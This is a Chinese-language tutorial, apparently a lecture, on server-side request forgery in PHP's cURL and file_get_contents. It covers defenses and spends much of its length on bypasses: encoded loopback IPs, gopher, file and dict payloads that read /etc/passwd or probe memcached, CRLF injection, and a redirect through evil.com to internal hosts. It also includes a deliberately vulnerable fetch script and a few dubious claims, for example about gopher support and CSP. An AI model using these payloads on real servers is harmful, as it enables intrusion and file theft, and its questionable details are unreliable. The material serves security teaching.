SSR（服务端请求伪造）防御：在PHP cURL与file_get_contents中的过滤绕过研究

SSRF（服务端请求伪造）防御：在PHP cURL与file_get_contents中的过滤绕过研究

各位同学，大家好。今天我们来聊聊一个非常重要的安全问题，服务端请求伪造，也就是SSRF。我们将深入探讨在PHP中，如何利用cURL和file_get_contents进行SSRF攻击，以及常见的防御策略，更重要的是，如何绕过这些防御策略。

什么是SSRF？

SSRF，简单来说，就是攻击者利用服务器作为跳板，去访问服务器内部网络或者其他外网资源。攻击者无法直接访问的资源，通过服务器进行访问。想象一下，你的服务器就像一个中间人，攻击者让这个中间人去替他做一些不该做的事情。

SSRF的危害

SSRF的危害非常大，可能包括：

• 内网信息泄露： 攻击者可以扫描内网，获取内部服务器的信息，例如版本号、配置信息等。
• 攻击内网服务： 攻击者可以利用SSRF攻击内网服务，例如数据库、缓存服务器、消息队列等。
• 读取本地文件： 攻击者可以读取服务器上的敏感文件，例如配置文件、密钥等。
• 执行任意命令： 在一些特殊情况下，攻击者甚至可以通过SSRF执行任意命令。

PHP中SSRF的常见函数

在PHP中，最常见的SSRF函数就是cURL和file_get_contents。

• cURL： 功能强大的网络请求库，可以发送各种类型的HTTP请求，支持多种协议。
• file_get_contents： 简单易用的函数，用于读取文件内容，也可以用于发起HTTP请求。

示例代码：使用cURL和file_get_contents发起请求

<?php

// 使用cURL
function curlRequest($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

// 使用file_get_contents
function fileGetContentsRequest($url) {
    $output = @file_get_contents($url); // 使用@抑制错误，避免信息泄露
    return $output;
}

// 示例
$url = $_GET['url']; // 接收用户输入的URL
$result_curl = curlRequest($url);
$result_fgt = fileGetContentsRequest($url);

echo "cURL Result: " . htmlspecialchars($result_curl) . "<br>";
echo "file_get_contents Result: " . htmlspecialchars($result_fgt) . "<br>";

?>

这段代码接收用户输入的URL，然后分别使用cURL和file_get_contents发起请求，并将结果显示出来。如果用户输入的是一个内网地址，例如http://127.0.0.1/sensitive.php，那么服务器就会尝试访问这个地址，并将结果返回给用户，从而导致SSRF漏洞。

常见的防御策略

为了防止SSRF攻击，常见的防御策略包括：

1. URL白名单/黑名单： 只允许访问特定的URL或禁止访问特定的URL。
2. IP白名单/黑名单： 只允许访问特定的IP地址或禁止访问特定的IP地址。
3. 禁用危险协议： 禁用file://, gopher://, ftp://等协议。
4. 限制请求跳转： 禁止或限制HTTP重定向。
5. 验证返回内容： 检查返回内容的类型和大小，防止读取本地文件。
6. 统一错误处理： 防止由于错误信息泄露敏感信息。

防御策略的局限性

虽然这些防御策略可以在一定程度上防止SSRF攻击，但它们也存在一些局限性。例如，URL白名单可能会遗漏一些有效的URL，IP白名单可能会被绕过，禁用协议可能会影响正常功能。

常见的绕过技巧

接下来，我们来重点讨论如何绕过这些防御策略。

1. IP地址绕过

   • 进制转换： 可以将IP地址转换为其他进制，例如八进制、十六进制。

     例如，127.0.0.1可以转换为0177.0.0.1（八进制）、0x7f.0.0.1（十六进制）。

   • DNS解析： 使用域名代替IP地址，绕过IP黑名单。如果域名解析到内网IP，就可以访问内网资源。

     例如，可以设置一个域名test.example.com解析到127.0.0.1。

   • 短地址： 使用短地址服务，将内网IP转换为短地址，绕过IP黑名单。

     例如，使用tinyurl.com将127.0.0.1转换为短地址。

   • IPv6： 使用IPv6地址::1代替127.0.0.1。

2. 协议绕过

   • Gopher协议： gopher://协议可以发送原始TCP数据，绕过HTTP协议的限制。 需要注意的是，PHP 5.4及之后版本默认禁用了gopher://协议。

     以下是一个使用gopher协议读取本地文件的例子。需要gopher协议启用。

     <?php
     $url = 'gopher://127.0.0.1:80/_%0D%0A'; // CRLF注入
     $url .= 'GET /etc/passwd HTTP/1.1%0D%0A';
     $url .= 'Host: 127.0.0.1%0D%0A';
     $url .= 'Connection: Close%0D%0A%0D%0A';
     
     $result = file_get_contents($url);
     echo htmlspecialchars($result);
     ?>

     这个例子使用Gopher协议构造了一个HTTP请求，请求读取/etc/passwd文件。%0D%0A是CRLF（回车换行），用于分隔HTTP请求头。

   • File协议： file://协议可以读取本地文件。 防御方式是禁用file协议，或者限制可以读取的文件。

     <?php
     $url = 'file:///etc/passwd';
     $result = file_get_contents($url);
     echo htmlspecialchars($result);
     ?>

     这个例子使用File协议读取/etc/passwd文件。

   • Dict协议： dict://协议可以获取服务器信息，例如开放的端口。

     <?php
     $url = 'dict://127.0.0.1:11211/info'; // 尝试连接memcached
     $result = file_get_contents($url);
     echo htmlspecialchars($result);
     ?>

     这个例子使用Dict协议尝试连接本地的Memcached服务器，并获取服务器信息。

3. URL解析绕过

   • 利用URL解析器的差异： 不同的URL解析器对URL的解析方式可能存在差异，可以利用这些差异绕过过滤。

     例如，某些URL解析器可能会忽略URL中的某些特殊字符，例如#、?、@。

     <?php
     $url = 'http://127.0.0.1#@127.0.0.1/sensitive.php'; // 利用#字符
     $result = file_get_contents($url);
     echo htmlspecialchars($result);
     ?>

     在这个例子中，#后面的@127.0.0.1/sensitive.php可能会被某些URL解析器忽略，从而访问到http://127.0.0.1。

   • CRLF注入： 在URL中注入CRLF（回车换行），可以构造恶意的HTTP请求头。

     <?php
     $url = 'http://example.com/%0D%0AContent-Length:%200%0D%0AConnection:%20close%0D%0A%0D%0AGET%20/sensitive.php%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0A';
     $result = file_get_contents($url);
     echo htmlspecialchars($result);
     ?>

     这个例子在URL中注入了CRLF，构造了一个新的HTTP请求头，请求访问127.0.0.1上的sensitive.php文件。

4. HTTP重定向绕过

   • 如果服务器禁止访问内网IP，但允许访问外网域名，可以利用HTTP重定向将请求重定向到内网IP。

     攻击者可以搭建一个服务器，将请求重定向到内网IP。

     例如，攻击者可以搭建一个服务器http://evil.com/redirect.php，内容如下：

     <?php
     header("Location: http://127.0.0.1/sensitive.php");
     ?>

     然后，攻击者将URL设置为http://evil.com/redirect.php，服务器会先访问http://evil.com/redirect.php，然后被重定向到http://127.0.0.1/sensitive.php。

5. 利用URL Scheme

   • 有些应用程序会使用自定义的URL Scheme，攻击者可以利用这些Scheme进行SSRF攻击. 具体利用方式取决于应用程序的实现.

防御的更高境界

仅仅依靠黑名单或者白名单是不够的，我们需要更深入的防御策略。

1. 限制网络权限： 使用防火墙或者容器技术，限制服务器的网络权限，只允许服务器访问必要的外部资源。
2. 代码审计： 定期进行代码审计，检查是否存在SSRF漏洞。
3. 使用安全的API： 尽量使用安全的API，例如使用经过验证的HTTP客户端库。
4. 监控： 监控服务器的网络请求，及时发现异常行为。
5. 内容安全策略（CSP）： 配置CSP头部，限制可以加载资源的来源，降低SSRF的风险。

代码示例：更安全的cURL使用方法

<?php

function safeCurlRequest($url) {
    // 1. 验证URL是否安全（例如，使用白名单）
    if (!isValidURL($url)) {
        return "Invalid URL";
    }

    // 2. 使用cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);

    // 3. 禁止跳转
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

    // 4. 设置超时时间
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    // 5. 限制协议
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);

    $output = curl_exec($ch);
    curl_close($ch);

    // 6. 验证返回内容
    if (!isValidContent($output)) {
        return "Invalid Content";
    }

    return $output;
}

// 示例
$url = $_GET['url'];
$result = safeCurlRequest($url);
echo htmlspecialchars($result);

// 辅助函数（需要根据实际情况实现）
function isValidURL($url) {
    // 例如，使用白名单验证URL
    $allowedDomains = ['example.com', 'safe.com'];
    $parsedUrl = parse_url($url);
    if (isset($parsedUrl['host']) && in_array($parsedUrl['host'], $allowedDomains)) {
        return true;
    }
    return false;
}

function isValidContent($content) {
    // 例如，检查内容类型和大小
    if (strlen($content) > 10240) { // 限制大小
        return false;
    }
    // 可以添加更复杂的验证逻辑
    return true;
}

?>

这个例子展示了如何更安全地使用cURL，包括：

• 验证URL是否安全。
• 禁止跳转。
• 设置超时时间。
• 限制协议。
• 验证返回内容。

不同防御手段的对比

下面表格对几种防御手段进行了对比：

防御手段	优点	缺点	绕过难度
URL 白名单	简单有效，只允许访问明确信任的URL。	维护成本高，容易遗漏合法的URL。	如果配置不当，容易绕过
IP 白名单	简单有效，只允许访问明确信任的IP地址。	容易被IP地址绕过技术绕过（进制转换、DNS解析等）。	较高
禁用危险协议	可以有效防止利用特定协议进行攻击。	可能会影响正常功能，例如禁用file协议可能导致无法读取本地文件。	较低
限制请求跳转	可以防止利用HTTP重定向进行攻击。	可能会影响正常功能，例如某些网站的登录流程需要重定向。	较低
验证返回内容	可以防止读取本地文件，例如检查返回内容的类型和大小。	需要根据实际情况定制验证规则，容易被绕过。	中等
统一错误处理	可以防止由于错误信息泄露敏感信息。	只是辅助手段，不能直接防止SSRF攻击。	无
限制网络权限	从根本上限制了服务器的网络访问能力，大大降低了SSRF的风险。	配置复杂，需要对网络和系统有深入的了解。	最高
代码审计	可以发现潜在的SSRF漏洞。	需要专业的安全人员进行，成本较高。	无
使用安全的API	可以避免使用不安全的函数，降低SSRF的风险。	需要评估API的安全性，并了解其使用方式。	较低
监控	可以及时发现异常行为，例如服务器尝试访问内网IP。	需要配置监控系统，并定期检查监控数据。	无
CSP	可以限制页面加载资源的来源，降低SSRF风险（仅对浏览器端有效，对服务器端发起的请求无效，但可以在一定程度上防御利用浏览器发起的SSRF攻击）	需要合理配置CSP策略，否则可能影响正常功能。 主要针对XSS，辅助防御SSRF。	中等

综合防御，提升安全水位

SSRF的防御是一个复杂的问题，没有一劳永逸的解决方案。我们需要综合使用多种防御策略，才能有效地防止SSRF攻击。单一的防御手段很容易被绕过，但多种防御手段结合在一起，可以大大提高攻击的难度。

总结：深刻理解SSRF，构建更安全的Web应用

今天我们深入探讨了SSRF的原理、危害、防御策略以及绕过技巧。希望大家能够深入理解SSRF，并在实际开发中应用这些知识，构建更安全的Web应用。我们需要不断学习新的安全知识，才能应对日益复杂的网络安全威胁。